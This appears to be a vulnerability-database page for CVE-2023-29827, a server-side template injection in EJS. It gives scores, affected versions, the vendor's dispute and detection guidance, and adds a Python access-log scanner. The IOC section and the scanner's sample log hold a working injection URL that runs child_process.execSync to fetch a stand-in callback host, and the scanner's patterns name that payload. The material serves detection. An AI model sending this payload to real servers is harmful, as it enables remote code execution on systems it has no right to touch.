cbcvebase.
CVE-2023-29827
published 2023-05-04

CVE-2023-29827: ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration…

Priority: P263 (critical, CVSS 3.1 base score 9.8)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 5.55% (91.9th percentile)
ejs v3.1.9 is vulnerable to server-side template injection. If the ejs file is controllable, template injection can be implemented through the configuration settings of the closeDelimiter parameter. NOTE: this is disputed by the vendor because the render function is not intended to be used with untrusted input.

Affected (2 ranges)

Vendor   Product    Version range   Fixed in
debian   node-ejs   -               -
ejs      ejs        >= 3.1.9        -

Detection & IOCs (extracted from sources)

URL: {{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//
Command: process.mainModule.require('child_process').execSync('wget http://{{interactsh-url}}');
  • Detect SSTI exploitation attempts against EJS via the `closeDelimiter` parameter in the `view options` settings object passed through HTTP query parameters.
  • Look for HTTP GET requests containing `settings[view%20options][closeDelimiter]` or `settings[view options][closeDelimiter]` in the query string as a strong indicator of CVE-2023-29827 exploitation.
  • Monitor for out-of-band HTTP interactions (e.g., interactsh/OAST callbacks) triggered from Node.js processes, which may indicate successful RCE via EJS SSTI.
  • Flag any Node.js process invoking `process.mainModule.require('child_process').execSync` originating from a web request handler, as this is the canonical payload pattern for this CVE.
  • The vulnerability is disputed by the EJS vendor; the render function is explicitly documented as not intended for use with untrusted input. Detection should be tuned to environments where user-controlled input reaches EJS render calls.
  • The Nuclei template targets a specific response body string to confirm exploitability; detections should also check for this application-specific response to reduce false positives.
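The detection bullets above can be turned into a log scanner. The following is an added example, not code from this page or from the EJS project: it parses combined-format access-log lines (the sample lines are constructed, and `oast.example` stands in for the `{{interactsh-url}}` placeholder), URL-decodes the query string so that both the `view%20options` and `view options` spellings normalise to one form, and grades each request. A `closeDelimiter` override combined with the `child_process`/`execSync` payload signature is rated high; either one alone is rated medium; as a generalisation beyond the page, any other `settings[view options][...]` key is rated low, since user-controlled EJS view options are not something a legitimate client sends. The severity labels and indicator names are this example's own choices.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample access-log lines (not real traffic); line 1 carries the page's
# payload shape, line 2 the decoded-space key form, line 4 the '+' and %5B encodings.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2023:10:00:01 +0000] "GET /page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://oast.example%27)%3b// HTTP/1.1" 200 512
10.0.0.6 - - [04/May/2023:10:00:02 +0000] "GET /page?settings[view options][closeDelimiter]=%25 HTTP/1.1" 200 512
10.0.0.7 - - [04/May/2023:10:00:03 +0000] "GET /page?name=alice HTTP/1.1" 200 512
10.0.0.8 - - [04/May/2023:10:00:04 +0000] "GET /page?settings%5Bview+options%5D%5BcloseDelimiter%5D=x HTTP/1.1" 200 512
"""

# Combined-log request line; the target is matched lazily so a literal space in a
# decoded query string (as some WAF logs emit) does not break parsing.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+"'
)
# Strong indicator from the page: the closeDelimiter key inside the view-options object.
CLOSE_DELIM_KEY = re.compile(r"^settings\[view options\]\[closeDelimiter\]$", re.I)
# Weaker, generalised indicator (this example's assumption): any view-options key.
VIEW_OPTIONS_KEY = re.compile(r"^settings\[view options\]\[", re.I)
# Canonical payload pattern named on the page.
PAYLOAD_SIG = re.compile(r"process\.mainModule\.require\(|child_process|execSync\(", re.I)


def classify_request(target: str) -> Dict:
    """Grade one request target (path plus query) for CVE-2023-29827 indicators."""
    path, _, query = target.partition("?")
    indicators: List[str] = []
    # parse_qsl percent-decodes keys and values and turns '+' into a space, so
    # 'view%20options', 'view+options' and 'view options' all compare equal.
    for key, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        key_norm = " ".join(key.split())  # collapse runs of whitespace inside the key
        if CLOSE_DELIM_KEY.match(key_norm):
            indicators.append("closeDelimiter_override")
        elif VIEW_OPTIONS_KEY.match(key_norm):
            indicators.append("view_options_override")
        if PAYLOAD_SIG.search(value):
            indicators.append("child_process_payload")

    has_key = "closeDelimiter_override" in indicators
    has_payload = "child_process_payload" in indicators
    if has_key and has_payload:
        severity = "high"
    elif has_key or has_payload:
        severity = "medium"
    elif indicators:
        severity = "low"
    else:
        severity = "none"
    return {"path": path, "indicators": indicators, "severity": severity}


def scan_access_log(text: str) -> List[Dict]:
    """Return one finding per log line that carries at least one indicator."""
    findings: List[Dict] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip rather than guess
        result = classify_request(m.group("target"))
        if result["severity"] == "none":
            continue
        findings.append({"line": line_no, "ip": m.group("ip"),
                         "method": m.group("method"), **result})
    return findings


if __name__ == "__main__":
    # Per the vendor dispute, only treat these as actionable where user input reaches
    # an EJS render call; the Nuclei template's response-body check is the next step.
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']:>3}  {f['severity']:<6}  {f['ip']:<10}  {f['indicators']}")
```

Run as a script it prints three findings (lines 1, 2 and 4); line 3 is an ordinary request and is not reported. Because the match is done on the decoded key, double-encoded variants are not caught; decode in a loop if your edge normalises more than once.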

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv             -         9.8     CRITICAL   -
vendor_debian   -         9.8     LOW        -